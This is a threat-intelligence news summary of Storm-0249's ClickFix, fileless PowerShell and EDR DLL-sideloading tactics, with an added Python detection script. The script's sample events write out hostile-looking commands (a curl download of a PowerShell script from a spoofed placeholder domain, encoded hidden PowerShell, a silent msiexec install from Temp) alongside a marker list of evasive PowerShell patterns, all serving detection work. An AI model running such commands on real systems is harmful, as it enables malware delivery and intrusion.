Storm-0249 Uses EDR Abuse and ClickFix for Stealthy Ransomware Deployment
Storm-0249, an initial access broker previously known for selling access to compromised networks, has adopted advanced techniques to facilitate ransomware attacks. The group now leverages social engineering tactics such as ClickFix, which tricks users into executing malicious commands via the Windows Run dialog. These commands use legitimate utilities like curl.exe to download and execute fileless PowerShell scripts from spoofed Microsoft domains, ultimately deploying malicious MSI packages with SYSTEM privileges. The attack chain includes DLL sideloading, where a trojanized DLL is placed alongside legitimate EDR components (notably SentinelOne's SentinelAgentWorker.exe), allowing the attacker's code to run within trusted processes and evade detection. Once persistence is established, Storm-0249 abuses EDR tools to collect system information and maintain stealthy access, making detection and remediation challenging for defenders.
This evolution in Storm-0249's tactics demonstrates a shift from mass phishing to highly targeted, stealthy operations that exploit trusted security software for malicious purposes. The abuse of EDR solutions not only enables the bypassing of traditional security controls but also provides a reliable foothold for ransomware deployment. Security researchers recommend implementing robust email filtering, monitoring for unusual use of legitimate utilities, and updating detection rules to identify these advanced techniques. Organizations are urged to review their EDR configurations and monitor for signs of DLL sideloading and unauthorized PowerShell activity to mitigate the risk posed by this threat actor.

How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Researchers warn EDR abuse technique could spread beyond SentinelOne
Security reporting highlighted that Storm-0249's use of trusted EDR components and Windows utilities is adaptable to other endpoint security products, raising concern that similar stealth techniques may be adopted more broadly. Defenders were urged to rely more on behavioral detection, baselining, DNS monitoring, and tighter controls on LoLBins and scripting tools.
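The recommendations in the summary above and in this event (behavioral detection of LoLBin use, unauthorized PowerShell, and DLL sideloading into EDR processes) are easiest to reason about as concrete rules. The Python sketch below is an added illustration written for this page; it is not code from the original reporting, from ReliaQuest, or from any cited source. It runs four simple rules over constructed, Sysmon-style process-creation (EventID 1) and image-load (EventID 7) records. The field names, the SentinelOne install directory used as a trusted load root, the spoofed-domain placeholder, user paths and DLL name are all assumptions, not values taken from the reports.

```python
import re

# Constructed Sysmon-style sample events (not real telemetry). EventID=1 is a
# process-creation record, EventID=7 an image (DLL) load. The spoofed domain,
# user paths and the DLL name are placeholders, not indicators from the reports.
SAMPLE_EVENTS = [
    # explorer.exe (the parent of a Run-dialog command) starts curl.exe with a URL
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\curl.exe '
    r'CommandLine="curl.exe -s https://update.microsoft-example.test/a -o C:\Users\u\AppData\Local\Temp\a.ps1"',
    # hidden, policy-bypassing, encoded PowerShell launched via cmd.exe
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe -w hidden -ep bypass -enc SQBFAFgA"',
    # PowerShell hands a package in the user's Temp directory to msiexec
    r'EventID=1 ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'Image=C:\Windows\System32\msiexec.exe '
    r'CommandLine="msiexec.exe /i C:\Users\u\AppData\Local\Temp\pkg.msi /qn"',
    # the EDR worker loads an unsigned DLL from a user-writable path (sideloading pattern)
    r'EventID=7 Image="C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe" '
    r'ImageLoaded=C:\Users\u\AppData\Local\Temp\pkg\helper.dll Signed=false',
    # benign: the same worker loading a signed DLL from its own install directory
    r'EventID=7 Image="C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe" '
    r'ImageLoaded="C:\Program Files\SentinelOne\Sentinel Agent\core.dll" Signed=true',
    # benign: ordinary interactive program launch
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe '
    r'CommandLine="notepad.exe C:\Users\u\notes.txt"',
    # benign: curl from a shell session rather than from the Run dialog
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\curl.exe '
    r'CommandLine="curl.exe -O https://example.test/tool.zip"',
]

EDR_PROCESS = "sentinelagentworker.exe"
# Assumed trusted load roots; the SentinelOne path is an assumption, adjust per deployment.
TRUSTED_LOAD_ROOTS = ("c:\\program files\\sentinelone\\", "c:\\windows\\system32\\",
                      "c:\\windows\\syswow64\\")
# Command-line fragments typical of hidden, in-memory or encoded PowerShell use.
PS_MARKERS = ("-encodedcommand", "-enc ", "-w hidden", "-windowstyle hidden",
              "-ep bypass", "-executionpolicy bypass", "invoke-expression", "iex ", "downloadstring")


def parse_event(line):
    """Parse one key=value record; values may be double-quoted to allow spaces."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in re.finditer(r'(\w+)=("([^"]*)"|\S+)', line)}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_clickfix_curl(ev):
    """curl.exe started directly by explorer.exe (how a Run-dialog command appears) with a URL."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) != "curl.exe":
        return None
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    if "http" not in ev.get("CommandLine", "").lower():
        return None
    return "curl.exe launched from explorer.exe with a URL: " + ev["CommandLine"]


def rule_suspicious_powershell(ev):
    """PowerShell carrying hidden-window, policy-bypass, encoded or download-and-run markers."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    cl = ev.get("CommandLine", "").lower()
    hits = [m for m in PS_MARKERS if m in cl]
    return "PowerShell with evasive/in-memory markers: " + ", ".join(hits) if hits else None


def rule_msi_from_user_path(ev):
    """msiexec.exe installing from a user-writable path, a URL, or a scripting parent."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) != "msiexec.exe":
        return None
    cl = ev.get("CommandLine", "").lower()
    parent = basename(ev.get("ParentImage", ""))
    if ("\\appdata\\" in cl or "\\temp\\" in cl or "http" in cl
            or parent in ("powershell.exe", "pwsh.exe", "curl.exe")):
        return "msiexec.exe installing from a user path or script parent: " + ev["CommandLine"]
    return None


def rule_edr_sideload(ev):
    """The EDR worker loading a DLL from outside its trusted roots, or an unsigned one."""
    if ev.get("EventID") != "7" or basename(ev.get("Image", "")) != EDR_PROCESS:
        return None
    loaded = ev.get("ImageLoaded", "").lower()
    untrusted_path = not loaded.startswith(TRUSTED_LOAD_ROOTS)
    unsigned = ev.get("Signed", "").lower() == "false"
    if untrusted_path or unsigned:
        return f"{EDR_PROCESS} loaded {'unsigned ' if unsigned else ''}DLL {ev['ImageLoaded']}"
    return None


RULES = [("clickfix_curl", rule_clickfix_curl),
         ("suspicious_powershell", rule_suspicious_powershell),
         ("msi_from_user_path", rule_msi_from_user_path),
         ("edr_sideload", rule_edr_sideload)]


def run_detections(lines):
    """Apply every rule to every record; return one finding per (record, rule) hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for name, rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"rule": name, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['detail']}")
```

Run on the sample set, the four malicious records each produce one finding and the three benign ones produce none. The parent-process condition in the curl rule is what keeps a developer's curl call from a shell out of the alert stream, which is the baselining point the reporting makes: the same utility is normal in one context and anomalous in another. The same pattern (process name plus expected install root plus signature state) transfers to any other EDR or agent process, which is the concern raised about the technique spreading beyond SentinelOne.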
Researchers reveal Storm-0249 collects system IDs for ransomware deployment
Analysis of the intrusion chain showed the attacker harvesting identifiers such as MachineGuid and other hardware-linked values from compromised systems. These identifiers are used to profile victims and support ransomware deployment workflows, including binding encryption to specific machines.
Storm-0249 abuses SentinelOne EDR via DLL sideloading and fileless PowerShell
In attacks analyzed by ReliaQuest, Storm-0249 used malicious curl commands, an MSI installer, in-memory PowerShell, and DLL sideloading to execute malware through trusted SentinelOne processes and evade detection. The activity established persistence and encrypted command-and-control while blending into legitimate system activity.
Storm-0249 shifts from broad phishing to targeted intrusion tactics
Storm-0249 evolved from broad phishing campaigns to more targeted attacks using domain spoofing, ClickFix-style social engineering, and living-off-the-land techniques to gain initial access for ransomware operations. Multiple reports describe this as a tactical escalation in how the group operates.
Sources
Storm-0249 Abuses EDR Processes in Stealthy Attacks (darkreading.com)
Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading (thehackernews.com)
Ransomware IAB abuses EDR for stealthy malware execution (bleepingcomputer.com)